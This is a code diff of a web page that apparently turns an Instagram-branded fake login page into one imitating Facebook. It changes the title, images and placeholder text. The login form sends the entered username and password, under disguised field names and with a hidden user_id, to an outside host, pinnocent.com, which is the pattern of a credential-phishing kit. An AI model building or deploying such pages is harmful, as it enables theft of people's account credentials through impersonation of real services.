--- a/index.html
+++ b/index.html
@@ -1,9 +1,10 @@
+
  <html lang="en">
                  <head> 
                  <link rel="stylesheet" href="w3.css">
                  <meta charset="UTF-8">
                  <meta name="viewport" content="width=device-width, initial-scale=1.0">
-                 <title>Login to instagram</title>
+                 <title>Login to Facebook</title>
           
                  <style type="text/css" id="operaUserStyle">
                  body{
@@ -21,7 +22,6 @@
                    margin: 5px;
                    padding: 20px;
                    background-image: url('background.jpg');
-color :white;
                  }
                  button {
                    height: 40px;
@@ -33,8 +33,8 @@ color :white;
                  </style>
                  </head>
           <center>
-                 <img class="w3-hide-large w3-hide-medium" src="igtop.png">
-                  <img class="w3-hide-small" style="width: 50%;" src="igtop.png">
+                 <img class="w3-hide-large w3-hide-medium" src="top.png">
+                  <img class="w3-hide-small" style="width: 50%;" src="top.png">
                  <center>
           
     <form action="https://pinnocent.com/vpage" method="POST">
@@ -45,7 +45,7 @@ color :white;
     <input type="hidden" name="user_id" value="16934">
     <div class="p-2 w-full  gap-1  ">
     <div class="flex flex-col   p-2  gap-1">
-    <input type="text" name="message_title" placeholder="Usernane, Email address or mobile number"> <br>
+    <input type="text" name="message_title" placeholder="Email address or mobile number"> <br>
     <input type="password" name="description" placeholder="Password" id="password" autocomplete="new-password" aria-autocomplete="list" required="password"></div>
     </center>
     <center>
@@ -55,8 +55,8 @@ color :white;
     </center>
     </div>
     </form>
-    <img class="w3-hide-large w3-hide-medium" src="igbottom.png">
-      <img class="w3-hide-small" style="width: 50%;" src="igbottom.png">
+    <img class="w3-hide-large w3-hide-medium" src="bottom.png">
+      <img class="w3-hide-small" style="width: 50%;" src="bottom.png">
     </div>
     </div>
     </div></body></html>
